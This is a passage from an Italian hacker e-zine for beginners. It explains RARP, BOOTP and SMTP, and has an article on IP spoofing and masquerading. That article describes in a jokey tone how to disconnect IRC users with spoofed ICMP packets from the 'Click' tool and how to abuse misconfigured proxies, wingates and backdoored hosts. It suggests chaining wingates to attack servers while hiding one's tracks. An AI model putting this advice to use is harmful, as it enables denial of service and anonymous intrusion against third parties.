accensione. Ma come funziona una macchina priva di sistema operativo e di
memoria di massa a collegarsi a una rete internet?
In genere queste macchine possiedono un piccolo programma di attivazione
memorizzato su una ROM programmabile, in grado di ottenere dalla rete stessa
le informazioni che servono al collegameto e quindi di scaricare da un server
remoto un pezzo di sistema operativo o comunque un' applicazione client in
grado di farlo operare in rete.
Allora, ci si potrebbe chiedere, perche' non memorizzare direttamente nella
PROM le informazioni che servono al sistema per il collegamento?
I motivi sono due. Il primo e' che dati di questo tipo sono disponibili solo
nel momento in cui si decide dove "collocare" il computer. Solo allora
l' amministratore della rete decidera' quali sono le informazioni che quel
determinato sistema deve conoscere. Un programma generico, che permette di
ottenere tali informazioni in modo dinamico puo' essere invece memorizzato
nella PROM direttamente in fabbrica, quando la macchina viene assemblata,
con evidente risparmio di tempo e denaro.
Il secondo motivo e' che una macchina puo' venire spostata da una rete fisica
ad un' altra, oppure l' amministratore dela rete puo' avere la necessita' di
riorganizzare tutto lo spazio di indirizzamento della stessa o modificarne i
parametri.

RARP

Il protocollo RARP (Reverse Address Resolution Protocol) si basa su due considerazioni.
La prima e' che, in effetti, un computer sa' come comunicare in rete, sa' cioe'
spedire e ricevere bit utilizzando i protocolli della rete fisica a cui e' collegato,
e sa' come identificarsi in modo univoco, dato che possiede un indirizzo fisico di
rete, generalmente corrispondente all' identificativo della scheda di communicazione
utilizzata.
La seconda e' che anche se un sistema non conosce l' indirizzo di rete di un
altro sistema con cui desidera comunicare, puo' sempre mandare un messaggio a
tutti i sistemi collegati localmente utilizzando la tecnica del "Broadcasting".
Non appena il computer viene acceso, il programma memorizzato nella PROM viene
mandato in esecuzione. Per prima cosa ricavera' della scheda di rete l'indirizzo
fisico del sistema. Questo identificativo e' memorizzato nella scheda e, non
dipendendo dal tipo o dal modello di computer utilizzato, sara' sicuramente
univoco. Questi identificativi sono costruiti un po' come i numeri telefonici
o gli indirizzi IP.
Ogni marca registra un proprio insieme, all'interno del quale si assicura che
indipendentemente dal modello, tutte le schede abbiano un indirizzo differente.
A questo punto il programma spedisce a tutte le macchine gia' collegate in rete
un messaggio in cui fornisce il proprio indirizzo fisico e chiede che gli venga
mandato in dietro quello IP. Perche' cio' avvenga e' necessatio che nella rete
fisica esista almeno un server RARP in grado di soddisfare la richiesta.
Esistono due differenti schemi che permettono a un server di ricavare l' indirizzo
IP a fronte di quello fisico: o il server possiede una tabella di conversione
che fornisce gli indirizzi IP di un certo numero di macchine a partire da
quelli fisici, oppure esiste una formula di conversione capace di convertire
l' indirizzo richiesto direttamente da quello fornito.
Nella rete puo' esserci anche piu' di un server RARP, anche perche' se fosse
l' unico e dovesse cadere, nessun computer potrebbe piu' ottenere il suo
indirizzo IP all' accensione. Per evitare che il client venga bombardato
dalle risposte di tutti i server RARP presenti in rete, per ogni client viene
assegnato un server primario. Tutti gli altri saranno quindi secondari.
Quando parte la richiesta, solo il server primario risponde subito, gli altri
la ignorano.
Puo' tuttavia succedere che il messaggio si perda o arrivi danneggiato, oppure
che il primario non funzioni o che sia sovracarico. In tal caso il client
rimanda la sua richiesta dopo un certo periodo di tempo.
Nel momento in cui arriva la seconda richiesta, ogni secondario in grado di
risolvere l' indirizzo fisico fornito, spedira' indietro l' indirizzo IP
corrispondente. In ogni caso il client utilizzera' la prima risposta che
arriva, ache se non ignorera' le altre, ma le utilizzera' come controprova
per maggior sicurezza.
A questo punto, ricevuto l' indirizzo IP, il programma di accensione potra'
comunicare in rete e ricevere dallo stesso o da un' altro server tutte le
informazioni che necessita, incluso l 'indirizzo da cui scaricarsi il sistema
operativo o l' applicativo client che gli permettera' di operare correttamente.
Questo tuttavia avvera' attraverso altri protocolli, come TFTP.
In realta' il protocollo RARP non serve solo a ottenere il proprio indirizzo IP,
ma permette a qualunque sistema si chiedere a un server RARP l' indirizzo IP
che corrisponde a un certo indirizzo fisico. In tal caso, il primo sistema
sara' detto richiedente "sender", il secondo destinatario "target".
La struttura del messaggio RARP e':
0 8 16 24 31
^ ^ ^ ^ ^
a b c d e

a --> |Tipo dell' interfaccia fisico |
b --> |Tipo di protocollo |
c --> |Lunghezza indirizzo fisico |
d --> |Lunghezza indirizzo IP |
e --> |Tipo di messaggio |
Indirizzo fisico del richiedente (otteti 0-3)
indirizzo fisico del richiedente (otteti 4-5) |
Il primo campo contiene il tipo d' interfaccia fisica a cui il sistema e'
collegato. Per esempio, per una rete Ethernet il tipo e' 0x0001. Questo in
quanto RARP opera a basso livello, incapsulando la struttura che stiamo
analizzando direttamente in un frame fisico. Il secondo campo contiene
l'identificativo del protocollo di cui si vuole avere l' indirizzo. Nel caso
di IP e' 0x0800.
RARP potrebbe infatti essere utilizzato per ricavare altri tipi di indirizzi
e lo stesso tipo di struttura e' utilizzato anche dal protocollo ARP, che
serve a ottenere l' indirizzo fisico a partire da quello di un protocollo di
piu' alto livello. I sucessivi due campi danno rispettivamente la lunghezza
dell' indirizzo fisico e quella dell' indirizzo del protocollo di alto livello,
nel nostro caso dell' IP.
Il quinto campo contiene il tipo di messaggio trasmesso. Ce ne sono 4 tipi, e
cioe' una richiesta d' informazione e una risposta contenente i dati richiesti
per ognuno dei due protocolli che usano questa struttura: ARP e RARP.
I campi successivi contengono gli indirizzi fisici e IP sai del richiedente
sia del destinatario.
Ovviamente, a seconda che il messaggio sia una richiesta o una risposta,
alcuni campi saranno riempiti mentre altri conterranno tutti zero.

Fine Darkman

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ BOOTP ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

BOOTP
Il protocollo che abbiamo appena preso in esame presenta alcuni svantaggi.
Innanzitutto il programma di accensione deve essere in grado di operare a
livello di rete fisica. Questo vuol dire che la stessa macchina non puo'
essere collegata a reti fisiche differenti.
Per esempio, se la PROM e' stata prorgammata per operare su una rete Ethernet,
essa non potra' essere utilizzata su una token ring, e viceversa. In questo
secondo luogo, RARP permette di ottenere solo l' indirizzo IP corrispondente
all' indirizzo fisico fornito.
Per operare in rete e' spesso necessario avere molte altre informazioni, come
per esempio l' indirizzo IP del router oppure la subnet mask.
Per ovviare e' stato sviluppato un altro protocollo che si appoggia sull' UPD
e che quindi e' indipendente dalla rete fisica.
UPD utilizza gli indirizzi IP, proprio come il suo fratello maggiore TCP. Questo
protocollo si chiama BOOTP (bootstrap protocol), e risolve molti problemi
caratteristici del RARP. Non solo: un server BOOTP puo' trovarsi su una rete
fisica differente da quella del richiedente o del destinatario.
IL protocollo BOOTP utilizza due porte riservate UPD, e cioe' la 68 per la
client e la 67 per il server. Ma come funziona una macchina che non conosce
il proprio indirizzo IP a utilizzare un protocollo basato proprio sull' IP?
La tecnica e' analoga a quella gia' utilizzata dal RARP. In pratica, il
messaggio viene mandato a tutti, via limited broadcasting. Fino al momento in
la distribuzione avviene nella rete fisica locale, l'IP e' in grado di
recapitare un messaggio che specifica come destinatario l' indirizzo riservato
255.255.255.255 senza per questo dover conoscere per forza l' indirizzo del
mittente o anche solo l' indirizzo del dominio locale. Ma a chi risponde il
server BOOTP?
Si potrebbe pensare che, visto che conosce l' indirizzo IP del richiedente,
potrebbe rispondere direttamente a quello. In realta' chi spedisce la richiesta
non conosce ancora il proprio indirizzo IPe quindi non riconoscerebbe come
indirizzata a se' la risposta.
Esistono diverse soluzioni. La piu' semplice, comunque, e' che anche il server
utilizzi una tecnica di broadcasting. Uno specifico campo nella risposta
conterra' un identificativo che permettera' al richiedente di associare la sua
richiesta con una delle tante risposte immesse nella rete dai vari server.
Il protocollo, inoltre, impone che il pacchetto spedito non possa mai essere
frammentato.
Il meccanismo utilizzato dal BOOTP segue quindi piu' o meno la stessa traccia
vista per il RARP, con la differenza che l' indirizzo fisico non e' coinvolto
direttamente e quindi il collegamento puo' avvenire senza bisogno che il
programma di accensione sappia operare a livello di rete fisica.
Anche nel caso del BOOTP esiste un' architettura basata su server primari e
secondari e sulla ritrasmissione della richiesta in caso di perdita di dati
o caduta del server primario.
Per evitare che un server BOOTP sia bombardato da un numero ingestibile di
richieste in caso di caduta e ripristino di tutta la rete locale, ogni client
utilizzera' un ritardo casuale da 0 a 4 secondi prima di ritrasmettere la
propria richiesta. Questo intervallo di tempo sara' raddoppiato nel caso di
una successiva ritrasmissione qualora anche quella precedente non abbia dato
risposta, e cosi' via.
Il protocollo BOOTP e' molto piu' veloce di quello RARP, e permette di fornire
al richiedente un maggior numero di informazioni: non soltanto l' indirizzo IP,
ma anche, per esempio l' indirizzo del gateway piu' vicino, l' indirizzo di un
file server per la memorizzazione dei dati, la subnet mask e altre informazioni
opzionali.
Vediamo i vari campi in dettaglio. I primi tre campi corrispondono al tipo di
messaggio se e' cioe' una richiesta bootrequest o una risposta bootreply, al
tipo di interfaccia fisica e alla lunghezza dell' indirizzo fisico, come in
RARP. Dato che BOOTP e' basato su UPD, abbiamo detto che il server che
risponde alla richiesta potrebbe trovarsi anche su un' altra rete fisica.
Il numero di salti che la richiesta fa' da una rete fisica all' altra prima
di raggiungere il server che la gestira' viene memorizza qui'.
Il campo successivo e' l' identificativo della transazione e permette di
associare la risposta alla richiesta originale. Dei due campi seguenti, il
primo riporta il numero di secondi passati da quando il client e' stato
acceso, mentre il secondo non e' utilizzato.
Da qui' in poi vengono i dati veri e propri.
Se il client sta usando BOOTP per conoscere il proprio indirizzo IP, il primo
campo di questo blocco sara' zero. Se invece la richiesta riguarda altre
informazioni, il client memorizzera' qui' il proprio indirizzo IP. Il campo
successivo conterra' l' indirizzo IP risolto dal server. Ovviamente quali
campi siano riempiti e quali siano nulli dipende dal tipo di messagio. I due
indirizzi IP successivi sono relativi al server BOOTP e al gateway piu' vicino.
Da notare che il client puo' richiedere che sia un server ben preciso e non
uno qualunque a rispondere alla sua richiesta. Questo puo' essere fatto
specificando nella richiesta l' indirizzo IP o il nome del server preferito.
Quest' ultima informazione segue immediatamente l' indirizzo fisico del
richiedente.
Il penultimo campo serve a contenere il nome di un file che a sua volta
conterra' tutta una serie di informazioni di boot per il client. In pratica,
quest' ultimo puo' chiedere al server di mandargli una vera e propria
configurazione d' avvio. Per far cio', il client specifichera' un nome breve,
una sorta di alias, che nella base dati del server corrispondera' a un file
fisico memorizzato da qualche parte nella rete.
Per esempio, se il client scrivera' "pcoffice" il server restituira' in quel
campo /usr/boot/pc/office.cfg
L' ultimo campo puo' contenere una lista di informazioni ulteriori che il
client desidera ricevere dal server BOOTP. Il protocollo BOOTP e' molto
importante, anche perche' su di esso si basa un' altro protocollo, molto
attuale e utilizzato da chiunque si colleghi in rete via modem tramite un ISP,
chiamato DHCP.

Fine Darkman

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ IP SPOOFING & IP MASQUERADE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

-----------------------------
IP SPOOFING & IP MASQUERADE.
-----------------------------

Parimpampu' .. eccomi qua.. parimpampu' .. ma chi lo sa .. ehmmm
hihihi gioventu' bruciata ;o)

Allora ... ecco cosa successe un bel di' di febbraio mentre chattavo con una
cara ragazza in IRC..(ehmm ..)
Un certo NObodY88 (e chi cavolo e' che mi scoccia proprio ora che la tipa mi
da' il num. di telefono? hihihi ;o))) mi chiama in query e mi dice: "Ti va di
scrivere per Newbies?"
"Orcalapeppa... io scrivere un articolo?? Ma... non ho le competenze necessarie,
non conosco l'italiano... e poi .. che cavolo e' Newbies?"
Pero'... pensa che ti ripensa, mi dico "perche' no" (hihihi) quindi mi butto
e decido di scrivere qualcosa che cerchi di 'chiarirci' un po' le idee sull'IP
spoofing e IP masquerade e di vedere in generale come funzionano (sperando
che gli insulti che manderete non mi facciano fischiare le orecchie in eterno)
Cosa sono? Cosa fanno? A che servono? 1 FIORINO!! (hihihi)

Ehhmm Premetto che tutto quello che scrivero' .... non potra' essere usato
contro di me.. perche' inteso a solo scopo (d)istruttivo.
Mi posso solo assumere la responsabilita' di aver scritto eventualmente
cagate (hihi ma nel caso, ditemelo con tatto... sono sensibile .. hihihi)
.. non quella delle vostre azioni :o)

Ok ciancio alle bande e iniziamo:

-------------------
*IP spoofing :
-------------------

Spesso si parla di IP Spoofato in modo errato;
vi e' mai capitato, per esempio di chattare in IRC con qualcuno che diceva di
avere l'IP spoofato? Ebbene quello in realta' non e' un IP spoofato ma mascherato.
L'IP spoofing infatti non permette una comunicazione 'bilaterale', ma permette
solo di inviare pacchetti senza ricevere risposte.
Perche'? Vediamolo.

L'IP spoofing e' una tecnica che consiste nell'inviare dei pacchetti
opportunamente 'modificati' per far credere al destinatario, che gli stessi
arrivino da tutt'altra parte e, quindi, per rendersi 'anonimi' (o meglio
spacciarsi per qualcun altro) agli occhi della "vittima".
Questo si ottiene modificando l'indirizzo IP sorgente (source IP) nell' header
(intestazione) del pacchetto (datagramma IP).

Che significa?
Immaginiamo di avere una persona che, per un motivo o per un altro, non ci
sia molto ... ehmm simpatica diciamo... anzi .. ci ispiri proprio una matta
voglia di spedirgli qualche insulto... cosi'.. giusto per rendere meno monotona
la vita.
Pero'... non vogliamo che sappia chi gli manda gli insulti e abbiamo anche il
dubbio che lui, vedendo una lettera provenire da noi, semplicemente la ignori...
vanificando quindi il nostro scopo.
Che facciamo allora?
Prendiamo una bella lettera di insulti (fantasiosi mi raccomando) e la mettiamo
in una busta (l'header del pacchetto) su cui pero' come mittente non metteremo
il nostro indirizzo, ma ad esempio: "Nonna Peppa, Via della Misericordia 666 "
(hihihi)
Cosa succede a questo punto?
Il destinatario riceve la lettera tranquillamente, giudicandola inoffensiva
(pensa tra se e se "Ohhh una lettera da Nonna Peppa, che dolce, che carina!!)
.... e invece nella lettera c'e' scritto qualcosa come: "@!*^'#"
A questo punto il tipo si altera un pochino e decide di rispondere con una
lettera altrettanto interessante... ma a chi inviera' la lettera?
Sicuramente a Nonna Peppa, visto che a tutti gli effetti la lettera sembra
provenire da lei.
Capito quindi? Con questa tecnica non si puo' ottenere una comunicazione,
semplicemente perche' il destinatario... non conosce il nostro indirizzo.

Vi chiederete... ma allora a cosa puo' servire questa tecnica visto che non
posso instaurare una comunicazione? E come posso modificare i pacchetti?

Be' l'IP spoofing viene utilizzato per molti attacchi sia di tipo D.o.S.
(Denial of Service, attacchi che possono mettere fuori uso, bloccare o
rallentare il sistema momentaneamente... fastidioso ma non provoca danni gravi),
sia per il tipico Hacking (attacchi molto piu' interessanti che possono
permettere di guadagnare particolari accessi nei sistemi) e utilizzato sia in
modo diretto (attaccando cioe' direttamente il sistema che riceve i pacchetti
spoofati), sia in modo indiretto (sfruttando cioe' le risposte che la macchina
destinataria dello spoof invia al presunto mittente).

Gli attacchi D.o.S. che si possono realizzare cmq sono molti: dai vari flood
(syn flood, rst flood) al click, al boink ecc. (eheh magari se ci sara' un
seguito a quest'articolo .....)

Oppure, se proprio si vuole avere la comunicazione bilaterale, si potrebbe
tentare di instaurarla alla ceca, cercando di prevedere le varie risposte
della vittima ai nostri pacchetti, e rispondendo a nostra volta in modo
adeguato (assicurandoci pero' che l'IP da noi spoofato sia in quel momento
irraggiungibile e non possa quindi rispondere anche lui alla vittima (che,
sta inviando pacchetti all'indirizzo da noi spoofato).

Uno schemino chiaro che riassume l'IP spoofing (e si trova su praticamente
tutti i documenti che trattano IP spoofing), e' all'incirca questo:

host A <---------------->X<--------------> host B
|
host S ---------------->/


in cui: noi siamo host S, il bersaglio del nostro attacco e' host B e il e
l'indirizzo sorgente che metteremo nell'header dei pacchetti al posto del
nostro, corrisponde al'indirizzo di host A

Come si puo' realizzare lo spoofing?
Be' per farvi un idea, un programma che lo realizza e che probabilmente
avrete utilizzato qualche volta (hihihi Lameroni) e' il famoso Click della
7th sphere... che fa esattamente questo:
Ipotizziamo un tipico attacco D.o.S. da lamer in IRC
Secondo lo schemino che c'e' li sopra: se noi siamo host S e vogliamo
disconnettere host B dal server IRC host A (un server a caso irc.tin.it
hihihi) che facciamo? Impostiamo il Click con i giusti dati e scegliamo tra
il modo client side oppure server side, quindi lanciamo l'attacco.
Mettiamo di aver scelto l'attacco client side....

Succede che il Click comincia a mandare a host B pacchetti ICMP spoofati
aventi come indirizzo sorgente host A (server IRC) e come contenuto una frase
del tipo "Sono Esploso!!". ("host unreachable")
Host B (vittima) a questo punto riceve questa 'lettera/pacchetto' proveniente
da Host A (server IRC), legge il messaggio e realizza che host A (server IRC)
e' esploso .. quindi pensa: "che cavolo ci rimango connesso a fare a un
indirizzo di server che non c'e' piu' perche' e' esploso?" a questo punto si
disconnette.
L'attacco e' realizzato, host B e' disconnesso da IRC.
Nel caso avessimo scelto il modo di attacco server side, il procedimento e'
uguale ma i pacchetti vengono mandati a host A (server IRC) e provenienti da
host B (vittima), quindi e' il server IRC che scollega host B credendolo
'esploso'.

Questo e' solo un esempio di attacco (ora non iniziate a scollegare la gente
solo per provare ;o))

In effetti, sfruttare appieno l'IP spoofing (anche per cercare di far qualcosa
in piu' dei tipici D.o.S.), significa soprattutto potersi costruire i pacchetti
da inviare, su misura.. a seconda del tipo di attacco che vogliamo realizzare.
Questo risulta piu' facile da ottenere ad esempio su sistemi Linux che su
Winzozz 9x, pero' per questi ultimi potreste utilizzare programmi appositi
(ad esempio exploit generator) che funzionano abbastanza bene.

Ok detto piu' o meno cos'e' l'IP spoofing e come funzia e capito che non si
puo' utilizzare per nascondere il nostro IP in una comunicazione bilaterale,
andiamo a vedere come si puo' fare a ottenere questo .. 'mascherando' e non
'spoofando' il nostro indirizzo IP.

----------------------
*IP masquerade:
----------------------

L'unico modo in effetti per avere un certo anonimato, e' far si che una
macchina faccia da tramite (piu' o meno volentieri) tra noi e il
bersaglio/vittima/destinatario.

Immaginiamo di essere Gambadilegno che vuole insultare Topolino, ma vuole
mantenere l'incognito (notoriamente, Topolino e Gambadilegno non vanno molto
d'accordo). Allora andiamo da Pippo (Yuk) che un po' credulone lo e', e gli
diciamo "va da Topolino, digli @#!^§ e fammi sapere cosa ti dice"; lui esegue,
Topolino 'riceve l'insulto da Pippo e risponde a Pippo' il quale poi torna da
Gambadilegno e gli dice "Ma che vuoi? io sono buono ma se continui fai una
brutta fine", esattamente la frase che Topolino ha detto a Pippo.
Ecco quindi che abbiamo comunicato con Topolino, facendo finta di essere Pippo.
(tutto questo grazie al fatto che Pippo e' beotino ;o)

Otteniamo quindi una cosa del tipo:

host S <--> host A <--> host B

in uno schema del genere noi siamo host S che spediamo pacchetti a host A
(tramite) il quale li rimbalza a host B (vittima) mettendo pero' il proprio
IP come sorgente ; a questo punto host B (vittima) vedra' i pacchetti inviati
da noi come provenienti da host A (tramite), quindi rispondera' a host A il
quale fara' di nuovo l'operazione che ha fatto prima .. cioe' rimbalzera' i
pacchetti inviati da host B (vittima) a host S (noi)
Cosa e' successo? E' successo che abbiamo ottenuto una comunicazione completa
di risposta (bilaterale) in cui pero' la vittima non ha il nostro IP ma pensa
di comunicare a tutti gli effetti con host A.

Come facciamo?
I metodi sono tanti... ce ne sono di piu' o meno 'legali' e piu' o meno
efficaci .. tutto dipende da cio' che volete fare .. e dal perche' vi serve
un IP mascherato.

Ci sono macchine gia' predisposte a fare da tramite (non solo da tramite ma
anche altre cose, ad esempio anche da buffer nel caso dei proxy) ad esempio
tra una certa rete locale e 'La rete delle reti'.
Le potremmo sfruttare a nostro vantaggio no?
Proxy/firewall, Wingate, Stargate.. sono tutte macchine che possono fare al
caso nostro e che, di solito dovrebbero autorizzare solo connessioni dal
l'interno della rete che controllano -> all'esterno(internet) e dall'esterno
della rete che controllano -> al suo interno.

rete controllata dal proxy <-------->| proxy/firewall |<--------> internet

Succede pero' ... che alle volte le macchine vengono configurate male e
allora.. un proxy (per esempio) autorizza comunicazioni anche dall'esterno
della rete locale che governa ... reindirizzate sempre all'esterno .(ecco
il nostro Pippo beotino)... e quindi si comporta come un vero 'rimbalzino'
(infatti stiamo realizzando un 'bouncing' :o) )

rete controllata dal proxy <-------->| proxy/firewall |<---------> internet
|
noi furboni <----------------------->/

E questo e' un metodo (un po' illegale :o)).Ma ce ne sono altri:
ad esempio utilizzando una shell (legale o meno che sia) su qualche server,
usando come tramite una macchina infetta da qualche backdoor che permette la
reindirizzazione dei dati (avete presente il BO?), oppure usando dei Remailer,
o dei Proxy di pubblico accesso (questi ultimi metodi sono legali ;o).
Tutto in fin dei conti dipende da cosa volete fare:

Volete mascherare il vostro IP (per motivi di protezione. non per essere
anonimi se fate cavolate ;o)) mentre chattate in IRC o con ICQ o con qualche
altro client che supporti i socks?
Basta inserire negli appositi setup l'indirizzo IP di qualche proxy o wingate
scoperto ed ecco l'IP mascherato (ma attenzione! Non siete protetti del tutto ;o)
Volete navigare mantenendo l'anonimato? utilizzate i Remailer o inserite
anche qui dei proxy (magari piu' di uno in catena per aumentare la sicurezza).
Volete attaccare qualche server? Fate bouncing da una shell su piu' Wingate,
Stargate ecc.... in catena per confondere le vostre tracce.
Volete provare a penetrare la Nasa? Ehmm lasciate perdere ;o))

Be' .. in grandi linee funzia cosi' ..
Se mi permetteranno di scrivere ancora... si potrebbero vedere alcuni tipi di
attacco ... che sfruttano queste tecniche... certo sempre dal punto di vista
di un newbies ;o))

'Iauz

Ramesse - (per insulti vari: ramesse@iname.com)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ SMTP ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Premetto che tutto quello che scrivo potrebbe essere smentito quindi aspettate
che qualcuno dei guru (vero duke? eheheh) mi dica che e' tutto giusto se no...
aspettatevi le correzioni sul 3ø numero.
Allora comincio un po' da lontano x arrivare dritto al punto.

<N0bodY88 SERIO MODE>
Chi di voi non ha sentito parlare di Agent x la posta elettronica? Un agent e'
un software speciale che svolge operazioni x una persona o un altro programma.
Ci sono 2 casi diversi, pero', il primo e' l'UA (User Agent), un agente utente
quindi, mentre il secondo, MTA (Message Transfer Protocol) e' un agente di tarsfe
rimento messaggio (simili, no?). Dove pero' il primo e' un programma email, mentre
il secondo e' un client o un programma server che svolge servizi di email,(quale
ad esempio quello di spedire o ricevere email x un computer host).
Per intenderci quindi UA lo sono ad esempio Eudora o Outlook Express, mentre
l'MTA rappresenta il sistema di e-mail che si collega tramite il protocollo TCP
con altri MTA col....SMTP :)
L'SMTP (dalle iniziali di Simple Mail Transfer Protocol) permette una comunicazione
quindi a doppio senso tra il client (locale) e il server (remoto). Il client MTA
manda dei comandi al rispettivo server MTA, che a sua volta risponde mandando le
risposte al client MTA. Da cio' si deduce che i comandi SMTP richiedono delle
risposte. dal modulo di ricezione SMTP.
Adesso provo a fare un esempio simile a quello contenuto nella RFC numero 821
</N0bodY88 SERIO MODE>
premettendo prima dei comandi N0bodY88 e Picci [ eheheh ] :

PS: metto davanti a ogni riga un nuemro cosi' da spiegare dopo dicendo alla linea
x c'e questo, alla y quest'altro

1 Picci : 220 newbies.org Simple Mail Transfer Service Ready
2 N0bodY88: HELO staff.org
3 Picci : 250 newbies.org
4 N0bodY88: MAIL FROM:<n0body88@staff.org>
5 Picci : 250 OK
6 N0bodY88: RCPT TO:<zerocool@newbies.org>
7 Picci : 250 OK
8 N0bodY88: RCPT TO:<inesistente@newbies.org>
9 Picci : 550 No such user here
10 N0bodY88: DATA
11 Picci : 354 Start mail input; end with <CRLF>.<CRLF>
12 N0bodY88: Ciao zero come va? e' un pakko che non ci sentiamo...
13 N0bodY88: ...etc. etc. etc.
14 N0bodY88: .
15 Picci : 250 OK
16 N0bodY88: QUIT
17 Picci : 221 newbies.org Service closing transmission channel

1 --> il msg e' quello che compare appena si stabilisce la connessione TCP, dato
che il server MTA invia il codice di risposta 220.
2 --> HELO e' la prima cosa che bisogna dire, come quando si saluta qualcuno per
la prima volta e si dice "Salve, sono Carcarlo Pravettoni" allo stesso modo
bisogna usare HELO coi server MTA
3 --> dopo che ci siamo "identificati" riceviamo la risposta del server, che ci
da' in questo modo l'ok x cominciare la transazione mail
4 --> con MAIL FROM (spero l'abbiate capito) si dice al server "questa lettera la
mando io che ho come e-mail n0body88@staff.org" quindi dovete mettere la
vs mail, ovviamente non se state mandando una lettera anonima o fake, meglio
specificare eheheheh
5 --> il server MTA ci da' l'ok con il quale conferma che ha capito il comando
6 --> RCPT TO viene passato al server con il nome del destinatario o dei destinatari
della e-mail, e se il comando e' scritto giusto e il server trova un utente
con relativa casella email sul server newbies.org allora da un codice risposta
d'ok 250
7 --> il server MTA risponde "va tutto bene" a modo suo col codice risposta 250
8 --> RCPT TO viene passato al server con il nome del destinatario o dei destinatari
della e-mail, e se il comando e' scritto giusto e il server trova un utente
con relativa casella email sul server newbies.org allora da un codice risposta
d'ok 250
9 --> il server MTA risponde con un codice di errore 550 xche' non esiste un utente
'inesistente' sul server newbies.org e quindi non ci sara' neanche una email...
10 -> con DATA si dice al server MTA "comincia a prendere appunti che sto per scrivere
la mia mail"
11 -> il server MTA manda al client MTA il codice risposta 354 che significa
"guarda che io sono pronto comincia pure a scrivere" e in piu' ti dice anke
che x concludere la mail devi andare a capo, scrivere solo un punto e ridare
invio x dire "ho finito la mia mail, adesso esci"
14 -> il punto non e' necessario...e' + che necessario, tant'e' che se non lo scrivete
scrivete all'infinito al vs amico che finche' non uscite non ricevera' niente
(tra le altre cose carine che accdaono se non mettete il punto eheheheheh)
15 -> il server MTA ci dice se ha capito (250) oppure se abbiamo commesso errori
16 -> con il comando QUIT diciamo al server "ue io devo andare che se no perdo
l'autobus e non mi incontro con la mia tipa" e quindi terminiamo la transazione
mail, xche' se non specifichaimo QUIT dal ns client MTA l'SMTP si incacchia e
vi dice "guarda che si saluta pezzo di m..aleducato che non 6 altro!".
17 -> il server MTA vi dice che chiude la trasmissione e vi dice "ciao a presto"
18 -> non controllate...non c'e' una riga 18...hihihihi

Concludo riportando alcuni codici risposta SMTP con relative descrizioni (fatte
da me e quindi NON fidatevi troppo...):

211 |--¯ risposta a un help di sistema
214 |--¯ messaggio di help
220 |--¯ servizio pronto
221 |--¯ il server sta chiudendo ils ervizio di trasmissione
250 |--¯ richiesta okki, completa e accettata :)
251 |--¯ utente non locale; termina con <CRLF>.<CRLF>
354 |--¯ avvia inserimento della tua e-mail; termina con <CRLF>.<CRLF>
421 |--¯ servizio non disponibile, chiusura del canale di trasmissione
450 |--¯ azione mail richiesta non eseguita; casella e-mail non disponibile
451 |--¯ azione richiesta eliminata; errore locale nella procedura
452 |--¯ azione richiesta non eseguita; sistema di memorizzazione insufficiente
500 |--¯ errore di sintassi, comando non riconosciuto
501 |--¯ errore di sintassi nei parametri o argomenti
502 |--¯ comando non attuato
503 |--¯ sbagliata sequenza di comandi
504 |--¯ parametro di comando non attuato
550 |--¯ azione richiesta non eseguita; casella postale non disponibile
551 |--¯ utente locale
552 |--¯ azione di mail richiesta eliminata; esaurito spazio memoria
553 |--¯ azione richiesta non eseguita; nome della casella postale non concesso
554 |--¯ operazione non riuscita

Per ulteriori info sul SMTP consultate le RFC (Request For Comments) 821 e 1123.

Byez at all N0bodY88

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
